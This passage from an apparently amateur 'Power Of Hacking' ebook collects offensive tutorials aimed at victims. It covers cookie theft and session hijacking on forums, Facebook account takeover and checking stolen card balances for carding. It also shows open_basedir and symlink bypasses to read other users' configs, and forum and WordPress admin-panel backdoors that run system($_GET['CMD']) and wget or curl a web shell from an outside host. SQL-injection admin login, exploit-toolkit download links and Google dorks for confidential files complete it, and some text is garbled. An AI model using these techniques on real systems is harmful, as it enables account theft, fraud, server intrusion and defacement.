3 - Create a new Notepad File and Save it as logfile.txt 4 - Upload this file to your server cookielogger.php - > http://www.yoursite.com/cookielogger.php logfile.txt- > http://www.yoursite.com/logfile.txt (chmod 777) fun.gif - > http://www.yoursite.com/fun.gif 5 - Go to the victim forum and insert this code in the signature or a post : <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>
6 - When the victim see the post he view the image you uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22 %22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9 7 - To get the access to the Victim's Account you need to replace your cookies with the Victim's Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 250
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
8 - Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim's account information. Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim's Session So if the Victim clicks on Logout you will also Log Out automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login. Hack Tutrial:16 FACEBOOK HACKING METHODS We have discussed alot about popular password cracking methods such as Bruteforce, Dictionary attack and Rainbow tables. However a question I get asked frequently is if it's possible to crack a Facebook account. So I wish to clear concepts related to Hacking/Cracking Facebook accounts. First of all "Hacking a Facebook account" and "Cracking a facebook account" are both different terminologies.Hacking a facebook account refers to foolproof methods such as Phishing, keylogging, Social engineering etc.However the terminology cracking refers to the methods such as Bruteforce, Dictionary attacks etc. 1:Brute Force Attacks 2:Dictionary Attacks 3:Cracking Facebook Accounts 4:Hack A Facebook Account By Exploiting Facebook's Trusted Friend Feature 5:Keylogging 6:Hijacking Facebook Fan Pages 7:Hack Facebook Account Status - Facebook Status Vulnerability 8:Facebook phishing 9:Stealers 10:Session Hijacking 11:Sidejacking With Firesheep 12:DNS Spoofing 13:USB Hacking 14:Man In the Middle Attacks 15:Botnets 16:Movable Mobile Hacking Hack Tutrial:LEARN ANDROID ROOT BASIC Basic Of Root Normally Your device is already unrooted when you buy it. Root your device means give superuser access to your mobile. Rooting your device means unlock your device. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 251
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Why Root? Ans: 1. Full control over your system. 2. Ability to alter system files. You can replace many parts of the "Android Core" with this including: Themes Core apps (maps, calendar, clock etc) Recovery image Bootloader Toolbox (linux binary that lets you execute simple linux commands like "ls") can be replaced with Busybox (slightly better option) Boot images Add linux binaries. 3. Run special apps that need more control over the system SuperUser (lets you approve or deny the use of root access to any program) Task Manager For Root (Lets you kill apps that you otherwise could not kill) Tether apps. 4. Backup your system You can make a folder on your sdcard and backup all of your .apk files to your sdcard (helps if an author decides to "upgrade" you to a version that requires you to pay to use the version you just had) 5. Relocate your (browser/maps/market) cache to your /sdcard 6. Relocate your installed applications to your /sdcard 7. Reboot your phone from the terminal app easily (su reboot ) Advantage of Rooted mobile: 1. Whith Rooted Device you can enjoy millions of application of Google play Who requires ROOT access. 2. after root your mobile you can remove inbuilt system apps and it will help you to boost your internal storage. 3. With the help of rooted device you can change your current original ROM and can use some custom ROMs like cynogenmod which will helps you to boost your Processor up to several MHz or GHZ. 4. It will super access you to internal memory/data/data folder with the help of root explorer and with it you can change any app or games data. 5. You can enjoy your device's hidden power after root it. 6. along with this there are 100 more advantages of rooted phone. Day by day when you use ROOTED android phone you'll understand yourself. but there are some minor disadvanges too. DISADVANTAGES: 1. ROOT access will void your warranty. 2. There is some risk when you root your device coz you have to do all process correctly otherwise it may happened your phone will be bricked or damage. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 252
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree So do it at your own risk I say. Hack Tutrial:HOW TO UNLOCK ANDROID PATTERN AND PASSWORD Android is one of the most popular mobile operating system. Because it is easy to use operating system. And It provides privacy to user by protecting their data by means of password or using patterns. Many android phone users take this advantage to protect their data using password or patterns. But what happens when they forget password or pattern.? If you are one of them who forget your password? Here with this trick you will know how to unlock android phone's password or pattern. Follow simple steps to unlock your android phone' password or pattern.
First of all Power Off your device. After this just press up volume key and hold it. Now press the power button and hold it. It will start a secret terminal. Then use home button for go up and down. Then choose option DELETE ALL USER DATA. It will take some time, and your android phone is unlocked.
That's all, you successfully unlocked your android phone password and pattern. Note : By using trick you will loose your phone's user data and all system files are reset to default, use this trick AT YOUR OWN RISK. Hack Tutrial:How To Get Free Credit Card + Master Card ® Simple 1st You Go To: Payoneer And Wait For 5 Seconds Then Click On To "Skip Ad►" Then Sign Up And Click On Activat And Submit Your House Address.. Now Wait For 1 Week... I Already Use It ☺ Hack Tutrial:HOW TO CHECK CREDIT CARD BALANCE QUICK FOR CARDER Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 253
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Today I'll be teaching you how to check the balance of a card. First of all, you will need to download Skype. After that go to Bin Checker and check the bin of the card, for example I will use bin 558158. When you scroll down you should see a bank telephone number, in this case is +1-800-935-9935 (chase bank) . Call this number from Skype (it's free since it's toll free) and the automatic robot will tell you to put your full card number and CVV. You will do that using the keypad from Skype. It will automatically tell you the balance of the card which is available. I have tested this for UK and USA and it's working perfectly ——by @UC Browser Hack Tutrial:HOW TO HACK FACEBOOK ACCOUNT IN URDU How To Hack Facebook Account With Very Simple & Easy Method!! Hi Friends !! Dosto Me 1 Trick Laya Hu Jis Se Ap Easily Facebook Account Hack Kr Sakte He !! Dosto Apne Dekha Hoga K Jb Bhi Ap Kisi Ka PC Use Krte He To Facebook Password save Hota He! But Problem Ye Hoti He K Code Kuch Aesa Hota He "********" Dosto Me Apko Aesi Script De RHA Hu Jis Se Ap Us Code Ko Break kr Sakte Ho!! SB Se Pehle Facebook Home PR Jae Auske Baad "Address Bar " Me Joke Left Side PR Hota He. Ausme Ye Code Paste Kre: javascript:alert (document.getElementById ('pass').value) Ye Code Paste Krke 2 Minutes Wait Kre saved Password Screen Pr A Jae Ga!! Enjoy!! Hack Tutrial:HOW TO PORT FORWARD YOUR ROUTER Here's a tutorial on how to port forward your Router, This is made specially for people who ask "How to port forward my RAT', 'How to open my Utorrent Port' etc. The tutorial is fairly simple and follow it step by step. Doesn't matter if you have a different router, the steps to open up the ports remain same though the interface will be different. The router that I'll be using in this tutorial is D-Link DIR-615 with Firmware 1.00 VG (No Modded Firmware) 1) First of all open your favorite browser, then in the Address bar type the local IP of your Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 254
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree router that is in most cases 192.168.0.1 or 127.0.0.1. In my case it's 192.168.0.1. After pressing Enter you will get the default login page of your router. 2) Enter your Username and Password, proceed to the main screen. 3) From the main interface select 'Advance' from the tab. 4) When you are on the Advance page, Choose 'Port Forwarding' from the tab on the left hand side 5) After choosing Port forwarding, you'll see the following (Similar) screen (Depends upon your Router) 6) What to do now? Name: In the 'Name' text box type the name of your PC IP Address: In the IP Address text box type the IP of your Computer (The one which you are going to port forward!) Public And Private Ports: Fill both text box of the Public and Private port with the port you want to port forward. Traffic Type: From the drop down menu under the 'Traffic type' choose the type of traffic you want to allow on this port. Warning! In my Case I've left it 'Any' (Vulnerable option, Consult Google and search the traffic type before choosing Any!) 7) After you are done. It'll look like this(Don't forget to check the check box):
8) Press Save Setting and you are done!
Before Port Forwarding:
After Port Forwarding: Hack Tutrial:BYPASS SYMLINK 100% Hello my friends today i will explain how to bypass any server even the security is 100000000% ^_^ so this method is private but i decided to make it public ^_^ So no need ".htaccess" or "ini.php" or "php.ini" to bypass ^_^ First let me explain some tricks °_° We know that php use html code , It's a language that can be executed in the command line Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 255
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree So in linux System the users privilege can execute many command in php and we can bypass the configuration ^_^. As we know in the cpanel server we have an option called "cron job" in the control panel to execute many commands. For example let's make a file called file.php CODE: <?php phpinfo(); ?> Secondly Go to the cpanel in the server and select "cron job" and add this command : /usr/local/bin/php -d open_basedir= /home/user/public_html/file.php As you can see : "/usr/local/bin/php" for the user
It's the command line in php
Note: in some servers it's installed in : "/usr/bin/php" -d <<<< put the config you want to execute in that file ^_^ open_basedir= <<<< here you put open_basedir empty to Bypass config in "file.php" /home/user/public_html/file.php <<< here is the path of php file that you want to execute ^_^
Other Bypass example: /usr/local/bin/php -d disable_functions= /home/user/public_html/file.php
Advanced method : Create a file example "hacks001.php" CODE: #!/usr/local/bin/php -d open_basedir= <?php phpinfo(); ?> Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 256
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Then just execute the file ^_^ Command: php mauritania.php Another method to bypass is to execute a perl file and you can read the file easily ! CODE:
#!/usr/bin/perl symlink ("/home/user/public_html/config.php","/home/user/public_html/test.tx t");
So that mean that the admin didn't run php as : *CGI module *SUPHP module . *apache module. *enable open_basedir and safe_mode . *"Chmod 000 /bin/ln" =========>>> the perl file still have the ability to create the links O.o hahaha :D but even if the admin runs that shit you still can bypass the system ^_^ perl is powerful <3 and if the admin try to disable "/usr/bin/perl" and chmod it to "0700" or less :p it will broke the cpanel ^_^ As it requires to be at "0755" for proper operations, since it is used by customers as well when it suexec into the user when they log into cPanel. So we cannot change it to that setting "700" , since it breaks the entire system ^_^ *So as you learned today "open_basedir" is the responsible of the mobility between the websites in the shell ^_^ So there is an option Called "Sec info sometimes "Sec" depends of the shell you are using ^_^ Example : C99 shell
We have this that mean that the open base dir is disabled : Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 257
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree "Open base dir: /home/user:/usr/lib/php:/usr/local/lib/php:/tmp" Okey in some servers you can bypass the security with jumping method , some hackers use php scanner to scan the whole paths in the server °_° that is wasting of time :3 by putting url before Linux : serverurl/~user/folder/shell.php °_° very old :s So i hope you understand bypass "Open Base_dir" :
now i uploaded for you a simple tool to
Hack Tutrial:-
DEFACING VBULLETIN SITES . . .VBULLETIN 1-LOG IN ADMIN CP 2-UNDER “PLUGINS & PRODUCTS”, SELECT ADD NEW PLUGIN 3-ADJUST THE SETTINGS AS FOLLOWS: PRODUCT: VBULLETIN HOOK L OCATION: GLOBAL_START TITLE: (ANYTHING …) EXECUTION ORDER: 5 CODE: OB_START (); SYSTEM($_GET['CMD ']); $EXECCODE = OB_GET_ CONTENTS(); OB_END_ CLEAN(); PLUGIN IS ACTIVE : YES SO IN THE END IT SHOULD LOOK (SEE PIC ) 4-AFTER THE PLUGIN IS ADDED, GO TO THE HEADING “STYLE AND DESIGN ”, SELECT “STYLE MANAGER 5-UNDER WHATEVER THE DEFAULT STYLE IS IN THE DROPDOWN MENU , SELECT EDIT TEMPLATES. 6-SCROLL FORUMH OME MODELS AND EXPAND. CLICK [CUSTOMIZE] BESIDE FORUMHOME. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 258
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree 7-SEARCH CODE: $HEADER SOMEWHERE NEAR THE TOP. REPLACE IT WITH : CODE: $HEADER $EXECCOD E
8-NOW GO TO THE FORUM AND ADD AFTER THE INDEX.PHP CODE: ?CMD=WGET HTTP://WWW.SITE.COM/SHELL.TXT;MVSHELL.TXT SHELL .PHP SO IT LOOKS LIKE CODE: HTTP:// WWW. SITE. COM/ PATHTOFORUM/ INDEX . PHP ?CMD= WGET HTTP:// WWW . SITE. COM/ SHEL L. TXT ; MV SHELL . TXT SHELL . PHP WHAT THIS DOES IS SHELL.TXT DOWNLOADS , AND RENAMES SHELL .PHP NOW, THE SHELL MUST BE LOCATED IN THE DIRECTORY SHELL. PHP FORUMS … I F NOT , THEN WGET IS DISABLED ON THAT SERVER , YOU CAN TRY ALTERNATIVE METHODS : CODE: HTTP:// WWW. SITE. COM/ PATHTOFORUM/ INDEX . PHP ?CMD= CURL HTTP:// WWW . SITE. COM/ SHELL .TXT > SHELL.PHP
CODE: HTTP:// WWW. SITE. COM/ PATHTOFORUM/ INDEX . PHP ?CMD=GET HTTP :// WWW . SITE. COM/ SHELL . TXT SHELL . PHP 4.SMF LOGIN INTO ADMINPANEL U NEED TO DOWNLOAD ANY SMF THEME IN ZIP FORMAT AND PUT UR SHELL . PHP IN IT AND SAVE ADMIN PANEL > SELECT THEMES AND LAYOUT > I NSTALL A NEW THEME > BROWSE AND UPLOAD THEME THATS HAVE OUR SHELL . PHP :) AFTER UPLOAD SHELL WILL FIND > SITE. COM/THEMES / THEME NAME / SHELL . PHP
5.IPB LOGIN ADMIN PANEL > LOOK AND FEEL SECTION ( EXAMPLE ) PUBLIC_HELP EDIT : HELP. TXT
>MANAGE LANGUAGES, CHOOSE LANGUAGE >
CHOOSE TOPIC FROM LIST, OR SEARCH FOR A TOPIC IN RIGHT BOX ADD THIS CODE: Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 259
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree ${${PRINT $QUERY='CD CACHE; WGET HTTP://LINK_TO_SHELL/SHELL.TXT;MV SHELL.TXT SHELL . PHP'}} ${${SYSTEM($QUERY,$OUT)}} ${${PRINT $OUT}} WHEN YOU ADD IT , SPECIFY GO ON BOTTOM NOW WE GO ON: HTTP:// WWW. SITE. COM/ INDEX. PHP?APP= CORE& MODULE = HELP
AND OUR CODE WE ADD WILL BE DONE, AND YOU WILL GET YOUR SHELL @ WWW, SITE. COM/ CACHE / SHELL . PHP 6.PHPBB LOGIN INTO ADMIN PANEL > GO ON STYLES -> TEMPLATES CHOOSE FAQ_BODY . HTML AT DOWN OF: <!-- INCLUDE OVERALL _HEADER.HTML -->
-> EDIT, FOR TEMPLATE FILE
WE ADD: <!-- PHP -->FWRITE(FOPEN($_GET[ O], 'W'), FILE _GET_CONTENTS($_GET[ I])); <!-- ENDPHP -->[PHP] AND SAVE IT.NOW GO ON : [PHP] WWW.SITE.COM/FORUM/FAQ.PHP? O=SHELL.PHP&I=HTTP://LINK_TO_SHELL.COM/SHELL .TXT SHELL FIND IN SITE PATH / SHELL . PHP [/PHP] MYBB FORUM LOGIN ADMINCP > G O TO TEMPLATES AND STYLES , FIND DEFAULT M YBB THEN GO TO TEMPLATES , EXPAND TEMPLATES THAT ARE USED BY THE CURRENT THEME . FIND CALENDAR TEMPLATES , CLICK IT . CLICK 'CALENDER '. ABOVE ALL THE HTML CODE, PASTE THIS : HTTP:// PASTEBIN . COM/ EV1W NGF M SAVE :) SHELL WILL B FIND IN SITE. COM/ CALENDAR . PHP NOTE: IF U GOT ERROR LIKE " CODE IS DANGER UNABLE TO EDIT
THEME IS.
"
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 260
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree THEN SIMPLY PASTE UR DEFACE CODE TO DEFACE CALENDAR . PHP
Hack Tutrial:BYPASS WHILE FTP LOGIN DURING WORDPRESS SHELL UPLOADS . how to bypass FTP login during wordpress shell upload. Sometimes when we are shelling a Wordpress website by uploading a theme in a zip file, it asks for ftp login information. This can be easily Bypassed using the below Method .
First of all, Log In to your target wordpress website, then in the left side, look for Pluginoption, click on it and select Add New .
There you will see a page titled Install Plugins, below it look for the option Upload and click on it
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 261
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
After clicking on the Upload option, you will get a new page asking you to upload the plugin, browse your.php shell for there and click on Upload
After the upload process is completed, you'll get the following Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 262
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Just skip this forum, and you are done xD ! Suppose the name of your shell was code.php, so inorder to access it gotohttp://www.website.com/wp-content/uploads/code.php
Hack Tutrial:IP- Digger is free pentesting and exploiting tool coded by two young Programmers and Hackers. After the successful release of their previous three versions so called <^> IP-Digger v1.0 :- The Initial Beginning Download Link :- http://www.mediafire.com/?2h1cp6gkhicmkth <^> IP-Digger v2.0 :- The Disaster Link :- http://www.mediafire.com/?5ybf5vqn63yhhg5 <^> IP-Digger v3.0 The W3b Xploit3r http://www.mediafire.com/?nnxeo9cjdcjr733 IP-Digger v4.0 is the weapon of mass destruction for the web exploiters. As this Version contains all hacking tool that the web exploiters need while pentesting the webservers. This is the first Indian Hacking toolkit ever released by Indian Hackers. This version is a blastic one. People Have appreciated their T0ol.
Features Of IP-DiggEr v4.0 The WeB Xploit3r The Next Level Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 263
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree FTP Brute Force Admin Panel Finder Website Vulnerability Scanning To0ls -------------------------------------------Joomla Vulnerability Scanner Wordpress Vulnerability Scanner
UniScan -> Web Vulnerability Scanner -------------------------------------------Uploaded Shell Finder ( Website ) -------------------------------------------Web-Backd0or ( Weevely ) -------------------------------------------Web Backd0or Generator ( Weevely ) Web Backd0or Server Connect0r ( Weevely ) Other Hacking To0lKit -------------------------------------------W3b T0olkit ============================================== Ip- DiggEr v4.0 The WeB Xploit3r The Next Level Download Link :- http://www.mediafire.com/?o3xsujs841gno79 Hack Tutrial:Hacking Facebook Account with just a text message:-----------------------------------------------------Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 264
Power Of HackingÂŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS.
Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username. According to hacker, the loophole was in process, or in technical file /ajax/settings/mobile/confirm_phone.php
phone
number terms,
linking at
This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.
As attacker, follow these steps to execute hack: 1. Change value of profile_id to the Victim's profile_id value by tampering the parameters. 2. Send the letter F to 32665, which is Facebookâ&#x20AC;&#x;s SMS shortcode in the UK. You will receive an 8 character verification code back.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 265
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
3. Enter that code in the box or as confirmation_code parameter value and Submit the form.
Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile.
In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 266
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password!
Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.
In return, Facebook paying $20,000 to fin1te as Bug Bounty HACK TUTRIAL:HOW TO VIEW THE PASSWORD BEHIND ASTERISK: Many times we need to see hidden passwords behind asterisk symbols in MOZILLA FIREFOX and INTERNET EXPLORER , there exist a simple JavaScript hack to achieve this – simply copy-paste the below code snippet into your web browser address bar to see what‟s inside the password field. Copy the next part onto the browser menu and see the hidden passwords in MOZILLA FIREFOX and INTERNET EXPLORER. javascript:(function(){vars,F,j,f,i;s="";F=d Hack Tutrial:Notepad can type automatically!!!!! Step 1: Open Notepad. Step 2: Copy Paste The Below Code in notepad. Set wshshell = wscript.CreateObject("WScript.Shell") Wshshell.run "Notepad" wscript.sleep 400 wshshell.sendkeys "H" wscript.sleep 100 wshshell.sendkeys "A" wscript.sleep 120 Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 267
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree wshshell.sendkeys wscript.sleep 200 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 140 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 50 wshshell.sendkeys wscript.sleep 120 wshshell.sendkeys wscript.sleep 170 wshshell.sendkeys wscript.sleep 200 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 50 wshshell.sendkeys wscript.sleep 120 wshshell.sendkeys wscript.sleep 160 wshshell.sendkeys wscript.sleep 200 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys
"C" "K" "E" "R" "P" "O" "S" "I" "T" "I" "V" "E" " " "!" "!" "!" "!" "D" "o" " " "l" "i" "k" "e"
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 268
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100 wshshell.sendkeys wscript.sleep 100
" " "t" "h" "i" "s" " " "p" "o" "s" "t" "!"
Step 3: Save the Notepad file As "tahir.vbs " (Without Quotes ) (You can use any name) Note : While saving select Save as type "All files" Step 4: Now execute the saved file, You will see "HACKERPOSITIVE!!! Do like this post!". It will be typed automatically. You can replace the Words in the above Code with Whatever you want Notepad to type. Enjoy ! Hack Tutrial:-
HOW TO LOGIN AS ADMIN OF ANY WEBSITE:
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 269
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Step 1). Go To Google.com and Then Search For the Following Piece of code, "adminlogin.asp" or "admin.asp" Step 2). Now Chose any website from the search results and then fill the below details in the login page, Username - admin Password - 'or''=' Enjoy Hack Tutrial:-
Animating Label Cloud
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 270
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
1. Go to your Blogger Dashboard and Click on Template 2. Then click on Edit HTML 3. Now search for below code be clicking CTRL + F <b:section class=’sidebar’ id=’sidebar’ preferred=’yes’> 4. Now paste below code just after the code you search on step 3. <b:widget id='Label99' locked='false' title='Labels' type='Label'> <b:includable id='main'> <b:if cond='data:title'> <h2><data:title/></h2> </b:if> <div class='widget-content'> <script src='http://sites.google.com/site/bloggerustemplatus/code/swfobject.js' type='text/javascript'/> <div id='flashcontent'>My Bloggers World <a href='http://mybloggersworld.com/'>Mbw</a> and <a href='http://mybloggersworld.com/'>Mbw</a></div> <script type='text/javascript'> var so = new SWFObject(&quot;http://sites.google.com/site/bloggerustemplatus/code/tagcloud.swf &quot;, &quot;tagcloud&quot;, &quot;240&quot;, &quot;300&quot;, &quot;7&quot;, &quot;#ffffff&quot;); // uncomment next line to enable transparency //so.addParam(&quot;wmode&quot;, &quot;transparent&quot;); so.addVariable(&quot;tcolor&quot;, &quot;0x333333&quot;); so.addVariable(&quot;mode&quot;, &quot;tags&quot;); so.addVariable(&quot;distr&quot;, &quot;true&quot;); so.addVariable(&quot;tspeed&quot;, &quot;100&quot;); so.addVariable(&quot;tagcloud&quot;, &quot;<tags><b:loop values='data:labels' var='label'><a expr:href='data:label.url' style='12'><data:label.name/></a></b:loop></tags>&quot;); so.addParam(&quot;allowScriptAccess&quot;, &quot;always&quot;); so.write(&quot;flashcontent&quot;); Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 271
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree </script> <b:include name='quickedit'/> </div> </b:includable> </b:widget> Hack Tutrial:-
GOOGLE SEARCH TIPS FOR HACKING Google is the world’s most popular and ultimate research tool. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results. Here is the list of best search engine tips, which will help you to find interesting and useful information. These special searches will make your life more easier with relevant results from google.
GOOGLE’S ADVANCED SEARCH QUERY SYNTAX: Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data. [ intitle: ] The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title. intitle: login password
will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page. Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title. intitle: login intitle: password is same as allintitle: login password [ inurl: ] The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 272
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it. allinurl: etc/passwd will look for the URLs containing “etc” and “passwd”. The slash ( “/”) between the words will be ignored by Google. [ site: ] The “site:” syntax restricts Google to query for certain keywords in a particular site or domain. exploitssite:trickswithhacker.blogspot.com will look for the keyword “exploits” in those pages present in all the links of the domain “trickswithhacker.blogspot.com”. There should not be any space between “site:” and the “domain name”. [ filetype: ] This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc). filetype:doc site:gov confidential will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites. [ link: ] “link:” syntax will list down webpages that have links to the specified webpage. link:www.trickswithhacker.blogspot.com will list webpages that have links pointing to the Security Focus homepage. Note there can be no space between the "link:" and the web page url. [ related: ] The “related:” will list web pages that are "similar" to a specified web page. related:www.trickswithhacker.blogspot.com will list web pages that are similar to the Security focus homepage. Note there can be no space between the "related:" and the web page url. [ cache: ] Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 273
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree The query “cache:” will show the version of the web page that Google has in its cache. cache:www.trickswithhacker.blogspot.com will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url. If you include other words in the query, Google will highlight those words within the cached document. cache:www.trickswithhacker.blogspot.com guest will show the cached content with the word "guest" highlighted. [ intext: ] The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles. intext:exploits will return only links to those web pages that has the search keyword "exploits" in its webpage. [ phonebook: ] “phonebook” searches for U.S. street address and phone number information. phonebook:Lisa+CA will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.
GOOGLE HACKS: Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for. Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers. Index Of Using “Index of ” syntax to find sites enabled with Index browsing A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 274
